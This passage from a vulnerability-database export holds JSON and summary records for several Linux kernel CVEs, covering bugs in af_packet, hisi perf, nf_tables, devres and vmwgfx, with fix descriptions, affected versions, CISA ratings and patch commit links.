"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/packet: fix slab-out-of-bounds access in packet_recvmsg()\n\nsyzbot found that when an AF_PACKET socket is using PACKET_COPY_THRESH\nand mmap operations, tpacket_rcv() is queueing skbs with\ngarbage in skb-\u003ecb[], triggering a too big copy [1]\n\nPresumably, users of af_packet using mmap() already gets correct\nmetadata from the mapped buffer, we can simply make sure\nto clear 12 bytes that might be copied to user space later.\n\nBUG: KASAN: stack-out-of-bounds in memcpy include/linux/fortify-string.h:225 [inline]\nBUG: KASAN: stack-out-of-bounds in packet_recvmsg+0x56c/0x1150 net/packet/af_packet.c:3489\nWrite of size 165 at addr ffffc9000385fb78 by task syz-executor233/3631\n\nCPU: 0 PID: 3631 Comm: syz-executor233 Not tainted 5.17.0-rc7-syzkaller-02396-g0b3660695e80 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106\n print_address_description.constprop.0.cold+0xf/0x336 mm/kasan/report.c:255\n __kasan_report mm/kasan/report.c:442 [inline]\n kasan_report.cold+0x83/0xdf mm/kasan/report.c:459\n check_region_inline mm/kasan/generic.c:183 [inline]\n kasan_check_range+0x13d/0x180 mm/kasan/generic.c:189\n memcpy+0x39/0x60 mm/kasan/shadow.c:66\n memcpy include/linux/fortify-string.h:225 [inline]\n packet_recvmsg+0x56c/0x1150 net/packet/af_packet.c:3489\n sock_recvmsg_nosec net/socket.c:948 [inline]\n sock_recvmsg net/socket.c:966 [inline]\n sock_recvmsg net/socket.c:962 [inline]\n ____sys_recvmsg+0x2c4/0x600 net/socket.c:2632\n ___sys_recvmsg+0x127/0x200 net/socket.c:2674\n __sys_recvmsg+0xe2/0x1a0 net/socket.c:2704\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7fdfd5954c29\nCode: 28 00 00 00 75 05 48 83 c4 28 c3 e8 41 15 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007ffcf8e71e48 EFLAGS: 00000246 ORIG_RAX: 000000000000002f\nRAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007fdfd5954c29\nRDX: 0000000000000000 RSI: 0000000020000500 RDI: 0000000000000005\nRBP: 0000000000000000 R08: 000000000000000d R09: 000000000000000d\nR10: 0000000000000000 R11: 0000000000000246 R12: 00007ffcf8e71e60\nR13: 00000000000f4240 R14: 000000000000c1ff R15: 00007ffcf8e71e54\n \u003c/TASK\u003e\n\naddr ffffc9000385fb78 is located in stack of task syz-executor233/3631 at offset 32 in frame:\n ____sys_recvmsg+0x0/0x600 include/linux/uio.h:246\n\nthis frame has 1 object:\n [32, 160) \u0027addr\u0027\n\nMemory state around the buggy address:\n ffffc9000385fa80: 00 04 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00\n ffffc9000385fb00: 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00\n\u003effffc9000385fb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3\n ^\n ffffc9000385fc00: f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 f1\n ffffc9000385fc80: f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 00 00 00 00 00\n=================================================================="
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:24:29.153Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b9d5772d60f8e7ef34e290f72fc20e3a4883e7d0"
},
{
"url": "https://git.kernel.org/stable/c/b1e27cda1e3c12b705875bb7e247a97168580e33"
},
{
"url": "https://git.kernel.org/stable/c/a33dd1e6693f80d805155b3f69c18c2f642915da"
},
{
"url": "https://git.kernel.org/stable/c/268dcf1f7b3193bc446ec3d14e08a240e9561e4d"
},
{
"url": "https://git.kernel.org/stable/c/70b7b3c055fd4a464da8da55ff4c1f84269f9b02"
},
{
"url": "https://git.kernel.org/stable/c/a055f5f2841f7522b44a2b1eccb1951b4b03d51a"
},
{
"url": "https://git.kernel.org/stable/c/ef591b35176029fdefea38e8388ffa371e18f4b2"
},
{
"url": "https://git.kernel.org/stable/c/c700525fcc06b05adfea78039de02628af79e07a"
}
],
"title": "net/packet: fix slab-out-of-bounds access in packet_recvmsg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48839",
"datePublished": "2024-07-16T12:25:10.521Z",
"dateReserved": "2024-07-16T11:38:08.909Z",
"dateUpdated": "2025-05-04T08:24:29.153Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52859 (GCVE-0-2023-52859)
Vulnerability from cvelistv5
Published
2024-05-21 15:31
Modified
2025-05-04 07:44
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
perf: hisi: Fix use-after-free when register pmu fails
When we fail to register the uncore pmu, the pmu context may not been
allocated. The error handing will call cpuhp_state_remove_instance()
to call uncore pmu offline callback, which migrate the pmu context.
Since that's liable to lead to some kind of use-after-free.
Use cpuhp_state_remove_instance_nocalls() instead of
cpuhp_state_remove_instance() so that the notifiers don't execute after
the PMU device has been failed to register.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:36.049Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e1e88bba286621b886218363de07b319d6208b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b660420f449d094b1fabfa504889810b3a63cdd5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3405f364f82d4f5407a8b4c519dc15d24b847fda"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/75bab28ffd05ec8879c197890b1bd1dfec8d3f63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b805cafc604bfdb671fae7347a57f51154afa735"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52859",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:36:28.164920Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:54.164Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/perf/hisilicon/hisi_uncore_pa_pmu.c",
"drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0e1e88bba286621b886218363de07b319d6208b2",
"status": "affected",
"version": "3bf30882c3c7b6e376d9d6d04082c9aa2d2ac30a",
"versionType": "git"
},
{
"lessThan": "b660420f449d094b1fabfa504889810b3a63cdd5",
"status": "affected",
"version": "3bf30882c3c7b6e376d9d6d04082c9aa2d2ac30a",
"versionType": "git"
},
{
"lessThan": "3405f364f82d4f5407a8b4c519dc15d24b847fda",
"status": "affected",
"version": "3bf30882c3c7b6e376d9d6d04082c9aa2d2ac30a",
"versionType": "git"
},
{
"lessThan": "75bab28ffd05ec8879c197890b1bd1dfec8d3f63",
"status": "affected",
"version": "3bf30882c3c7b6e376d9d6d04082c9aa2d2ac30a",
"versionType": "git"
},
{
"lessThan": "b805cafc604bfdb671fae7347a57f51154afa735",
"status": "affected",
"version": "3bf30882c3c7b6e376d9d6d04082c9aa2d2ac30a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/perf/hisilicon/hisi_uncore_pa_pmu.c",
"drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.139",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.63",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.5.*",
"status": "unaffected",
"version": "6.5.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.7",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.139",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.63",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.5.12",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.2",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf: hisi: Fix use-after-free when register pmu fails\n\nWhen we fail to register the uncore pmu, the pmu context may not been\nallocated. The error handing will call cpuhp_state_remove_instance()\nto call uncore pmu offline callback, which migrate the pmu context.\nSince that\u0027s liable to lead to some kind of use-after-free.\n\nUse cpuhp_state_remove_instance_nocalls() instead of\ncpuhp_state_remove_instance() so that the notifiers don\u0027t execute after\nthe PMU device has been failed to register."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:44:27.898Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0e1e88bba286621b886218363de07b319d6208b2"
},
{
"url": "https://git.kernel.org/stable/c/b660420f449d094b1fabfa504889810b3a63cdd5"
},
{
"url": "https://git.kernel.org/stable/c/3405f364f82d4f5407a8b4c519dc15d24b847fda"
},
{
"url": "https://git.kernel.org/stable/c/75bab28ffd05ec8879c197890b1bd1dfec8d3f63"
},
{
"url": "https://git.kernel.org/stable/c/b805cafc604bfdb671fae7347a57f51154afa735"
}
],
"title": "perf: hisi: Fix use-after-free when register pmu fails",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52859",
"datePublished": "2024-05-21T15:31:52.546Z",
"dateReserved": "2024-05-21T15:19:24.260Z",
"dateUpdated": "2025-05-04T07:44:27.898Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52581 (GCVE-0-2023-52581)
Vulnerability from cvelistv5
Published
2024-03-02 21:59
Modified
2025-05-04 12:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: fix memleak when more than 255 elements expired
When more than 255 elements expired we're supposed to switch to a new gc
container structure.
This never happens: u8 type will wrap before reaching the boundary
and nft_trans_gc_space() always returns true.
This means we recycle the initial gc container structure and
lose track of the elements that came before.
While at it, don't deref 'gc' after we've passed it to call_rcu.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8da1b048f9a501d3d7d38c188ba09d7d0d5b8c27 Version: bbdb3b65aa91aa0a32b212f27780b28987f2d94f Version: 448be0774882f95a74fa5eb7519761152add601b Version: d19e8bf3ea4114dd21fc35da21f398203d7f7df1 Version: ea3eb9f2192e4fc33b795673e56c97a21987f868 Version: 5f68718b34a531a556f2f50300ead2862278da26 Version: 5f68718b34a531a556f2f50300ead2862278da26 Version: 0624f190b5742a1527cd938295caa8dc5281d4cd |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52581",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-05T20:19:37.141289Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-07T14:54:23.969Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.164Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7cf055b43756b10aa2b851c927c940f5ed652125"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a995a68e8a3b48533e47c856865d109a1f1a9d01"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09c85f2d21ab6b5acba31a037985b13e8e6565b8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef99506eaf1dc31feff1adfcfd68bc5535a22171"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e5d732e6902eb6a37b35480796838a145ae5f07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4aea243b6853d06c1d160a9955b759189aa02b14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf5000a7787cbc10341091d37245a42c119d26c5"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/netfilter/nf_tables.h",
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7cf055b43756b10aa2b851c927c940f5ed652125",
"status": "affected",
"version": "8da1b048f9a501d3d7d38c188ba09d7d0d5b8c27",
"versionType": "git"
},
{
"lessThan": "a995a68e8a3b48533e47c856865d109a1f1a9d01",
"status": "affected",
"version": "bbdb3b65aa91aa0a32b212f27780b28987f2d94f",
"versionType": "git"
},
{
"lessThan": "09c85f2d21ab6b5acba31a037985b13e8e6565b8",
"status": "affected",
"version": "448be0774882f95a74fa5eb7519761152add601b",
"versionType": "git"
},
{
"lessThan": "ef99506eaf1dc31feff1adfcfd68bc5535a22171",
"status": "affected",
"version": "d19e8bf3ea4114dd21fc35da21f398203d7f7df1",
"versionType": "git"
},
{
"lessThan": "7e5d732e6902eb6a37b35480796838a145ae5f07",
"status": "affected",
"version": "ea3eb9f2192e4fc33b795673e56c97a21987f868",
"versionType": "git"
},
{
"lessThan": "4aea243b6853d06c1d160a9955b759189aa02b14",
"status": "affected",
"version": "5f68718b34a531a556f2f50300ead2862278da26",
"versionType": "git"
},
{
"lessThan": "cf5000a7787cbc10341091d37245a42c119d26c5",
"status": "affected",
"version": "5f68718b34a531a556f2f50300ead2862278da26",
"versionType": "git"
},
{
"status": "affected",
"version": "0624f190b5742a1527cd938295caa8dc5281d4cd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/netfilter/nf_tables.h",
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.5"
},
{
"lessThan": "6.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.5.*",
"status": "unaffected",
"version": "6.5.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.6",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.5.6",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix memleak when more than 255 elements expired\n\nWhen more than 255 elements expired we\u0027re supposed to switch to a new gc\ncontainer structure.\n\nThis never happens: u8 type will wrap before reaching the boundary\nand nft_trans_gc_space() always returns true.\n\nThis means we recycle the initial gc container structure and\nlose track of the elements that came before.\n\nWhile at it, don\u0027t deref \u0027gc\u0027 after we\u0027ve passed it to call_rcu."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:49:19.969Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7cf055b43756b10aa2b851c927c940f5ed652125"
},
{
"url": "https://git.kernel.org/stable/c/a995a68e8a3b48533e47c856865d109a1f1a9d01"
},
{
"url": "https://git.kernel.org/stable/c/09c85f2d21ab6b5acba31a037985b13e8e6565b8"
},
{
"url": "https://git.kernel.org/stable/c/ef99506eaf1dc31feff1adfcfd68bc5535a22171"
},
{
"url": "https://git.kernel.org/stable/c/7e5d732e6902eb6a37b35480796838a145ae5f07"
},
{
"url": "https://git.kernel.org/stable/c/4aea243b6853d06c1d160a9955b759189aa02b14"
},
{
"url": "https://git.kernel.org/stable/c/cf5000a7787cbc10341091d37245a42c119d26c5"
}
],
"title": "netfilter: nf_tables: fix memleak when more than 255 elements expired",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52581",
"datePublished": "2024-03-02T21:59:47.856Z",
"dateReserved": "2024-03-02T21:55:42.569Z",
"dateUpdated": "2025-05-04T12:49:19.969Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43871 (GCVE-0-2024-43871)
Vulnerability from cvelistv5
Published
2024-08-21 00:06
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
devres: Fix memory leakage caused by driver API devm_free_percpu()
It will cause memory leakage when use driver API devm_free_percpu()
to free memory allocated by devm_alloc_percpu(), fixed by using
devres_release() instead of devres_destroy() within devm_free_percpu().
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ff86aae3b4112b85d2231c23bccbc49589df1c06 Version: ff86aae3b4112b85d2231c23bccbc49589df1c06 Version: ff86aae3b4112b85d2231c23bccbc49589df1c06 Version: ff86aae3b4112b85d2231c23bccbc49589df1c06 Version: ff86aae3b4112b85d2231c23bccbc49589df1c06 Version: ff86aae3b4112b85d2231c23bccbc49589df1c06 Version: ff86aae3b4112b85d2231c23bccbc49589df1c06 Version: ff86aae3b4112b85d2231c23bccbc49589df1c06 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43871",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:06:19.881196Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:18.604Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/base/devres.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "700e8abd65b10792b2f179ce4e858f2ca2880f85",
"status": "affected",
"version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
"versionType": "git"
},
{
"lessThan": "b044588a16a978cd891cb3d665dd7ae06850d5bf",
"status": "affected",
"version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
"versionType": "git"
},
{
"lessThan": "ef56dcdca8f2a53abc3a83d388b8336447533d85",
"status": "affected",
"version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
"versionType": "git"
},
{
"lessThan": "3047f99caec240a88ccd06197af2868da1af6a96",
"status": "affected",
"version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
"versionType": "git"
},
{
"lessThan": "3dcd0673e47664bc6c719ad47dadac6d55d5950d",
"status": "affected",
"version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
"versionType": "git"
},
{
"lessThan": "b67552d7c61f52f1271031adfa7834545ae99701",
"status": "affected",
"version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
"versionType": "git"
},
{
"lessThan": "95065edb8ebb27771d5f1e898eef6ab43dc6c87c",
"status": "affected",
"version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
"versionType": "git"
},
{
"lessThan": "bd50a974097bb82d52a458bd3ee39fb723129a0c",
"status": "affected",
"version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/base/devres.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndevres: Fix memory leakage caused by driver API devm_free_percpu()\n\nIt will cause memory leakage when use driver API devm_free_percpu()\nto free memory allocated by devm_alloc_percpu(), fixed by using\ndevres_release() instead of devres_destroy() within devm_free_percpu()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:13.712Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/700e8abd65b10792b2f179ce4e858f2ca2880f85"
},
{
"url": "https://git.kernel.org/stable/c/b044588a16a978cd891cb3d665dd7ae06850d5bf"
},
{
"url": "https://git.kernel.org/stable/c/ef56dcdca8f2a53abc3a83d388b8336447533d85"
},
{
"url": "https://git.kernel.org/stable/c/3047f99caec240a88ccd06197af2868da1af6a96"
},
{
"url": "https://git.kernel.org/stable/c/3dcd0673e47664bc6c719ad47dadac6d55d5950d"
},
{
"url": "https://git.kernel.org/stable/c/b67552d7c61f52f1271031adfa7834545ae99701"
},
{
"url": "https://git.kernel.org/stable/c/95065edb8ebb27771d5f1e898eef6ab43dc6c87c"
},
{
"url": "https://git.kernel.org/stable/c/bd50a974097bb82d52a458bd3ee39fb723129a0c"
}
],
"title": "devres: Fix memory leakage caused by driver API devm_free_percpu()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43871",
"datePublished": "2024-08-21T00:06:22.964Z",
"dateReserved": "2024-08-17T09:11:59.280Z",
"dateUpdated": "2025-05-04T09:28:13.712Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48887 (GCVE-0-2022-48887)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/vmwgfx: Remove rcu locks from user resources
User resource lookups used rcu to avoid two extra atomics. Unfortunately
the rcu paths were buggy and it was easy to make the driver crash by
submitting command buffers from two different threads. Because the
lookups never show up in performance profiles replace them with a
regular spin lock which fixes the races in accesses to those shared
resources.
Fixes kernel oops'es in IGT's vmwgfx execution_buffer stress test and
seen crashes with apps using shared resources.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48887",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:35.491654Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:51.743Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
